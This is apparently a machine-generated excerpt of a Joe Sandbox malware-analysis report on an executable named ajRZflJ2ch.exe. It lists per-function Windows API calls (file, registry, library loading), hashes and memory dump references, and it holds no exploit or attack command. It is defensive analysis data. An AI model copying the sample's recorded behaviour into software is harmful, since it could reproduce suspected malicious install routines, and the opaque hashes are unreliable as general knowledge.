                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                            • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                            • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                            • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                            • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                            • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                            • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                            • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                            • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                            • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                            • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                            • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                            • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 004032F2
                                                                                                              • Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
                                                                                                            • SetFilePointer.KERNELBASE(0016CC9B,00000000,00000000,00414ED0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointer$CountTick
                                                                                                            • String ID:
                                                                                                            • API String ID: 1092082344-0
                                                                                                            • Opcode ID: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                            • Instruction ID: a2c2ae871b20a7f651e14226ae934804f023725c52e887911cb1b1382089a511
                                                                                                            • Opcode Fuzzy Hash: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                            • Instruction Fuzzy Hash: 54313872610215DBD721DF29EEC496A3BA9F74039A754433FE900F62E0CBB99D018B9D
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 0040205D
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 0040206E
                                                                                                            • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,?,000000F0), ref: 004020EB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 334405425-0
                                                                                                            • Opcode ID: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                                            • Instruction ID: 38390b8595ebf5dc4f6cf14c4d4b7ed92d06cc21542818b97b262269bef072d5
                                                                                                            • Opcode Fuzzy Hash: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                                            • Instruction Fuzzy Hash: DC218331D00215BACF20AFA5CE4D99E7A70BF04358F60413BF511B51E0DBBD8991DA6E
                                                                                                            APIs
                                                                                                            • GlobalFree.KERNEL32(00782918), ref: 00401BE7
                                                                                                            • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocFree
                                                                                                            • String ID: Call
                                                                                                            • API String ID: 3394109436-1824292864
                                                                                                            • Opcode ID: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
                                                                                                            • Instruction ID: 4b9c6e54fa6809cb214bd66434af352d7e41d31d349781cb692caa9f676c35e6
                                                                                                            • Opcode Fuzzy Hash: f7405ea9e476423423cde41a6620a17073824cabe1c2d7eedde19d286f021b37
                                                                                                            • Instruction Fuzzy Hash: 6E217B73A00200D7DB20EB94CEC995E73A4AB45314765053BF506F32D1DBB8E851DBAD
                                                                                                            APIs
                                                                                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 0040252B
                                                                                                            • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 0040253E
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsd88AD.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Enum$CloseValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 397863658-0
                                                                                                            • Opcode ID: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                                                                            • Instruction ID: 69a0bd767b5398a5b54c194fc83da7942780fa4e63ecbf8b5358c30743fc2944
                                                                                                            • Opcode Fuzzy Hash: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                                                                            • Instruction Fuzzy Hash: 4B017171904204ABEB149F95DE88ABF7AB8EF80348F10403EF505B61D0DAB85E419B69
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 973152223-0
                                                                                                            • Opcode ID: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                            • Instruction ID: f938e70baf20f89fc7421c1cbc4d65c8cbb1a4a40291e2e844035b0cdbff1196
                                                                                                            • Opcode Fuzzy Hash: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                            • Instruction Fuzzy Hash: 53314B30200219BBDB109F95ED84ADA3E68EB04759F20857EF905E62D0D6789A509BA9
                                                                                                            APIs
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,75572EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405D76
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                              • Part of subcall function 0040591F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 1892508949-0
                                                                                                            • Opcode ID: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                                            • Instruction ID: 0139da5d792eeb989572d84d187c25f91b4f70b2bd1842bf542401118de2a59f
                                                                                                            • Opcode Fuzzy Hash: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                                            • Instruction Fuzzy Hash: 0511E631504511EBCF30AFA4CD4159F36A0EF15329B29453BFA45B22F1DB3E49419B5D
                                                                                                            APIs
                                                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsd88AD.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3356406503-0
                                                                                                            • Opcode ID: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                                            • Instruction ID: 8b4d26b48c61f4aea5aea8b01f6eaa690eaa4425e6198d6413393360261ed691
                                                                                                            • Opcode Fuzzy Hash: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                                            • Instruction Fuzzy Hash: 61119431910205EBDB14DF64CA585AE7BB4EF44348F20843FE445B72D0D6B85A81EB5A
                                                                                                            APIs
                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                            • Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
                                                                                                            • Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                            • Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
                                                                                                            APIs
                                                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseDeleteValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 2831762973-0
                                                                                                            • Opcode ID: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                                            • Instruction ID: 92c71ce55c792e737e0c56b3c5c8c262173643586798c2a655fc457b9e75749a
                                                                                                            • Opcode Fuzzy Hash: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                                            • Instruction Fuzzy Hash: 5FF0F632E041109BE700BBA49B8EABE72A49B44314F29003FFE42F31C0CAF85D42976D
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                              • Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                              • Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
                                                                                                              • Part of subcall function 00406752: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 2547128583-0
                                                                                                            • Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                            • Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
                                                                                                            • Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                            • Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E
                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\ajRZflJ2ch.exe,80000000,00000003), ref: 00405EE2
                                                                                                            • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
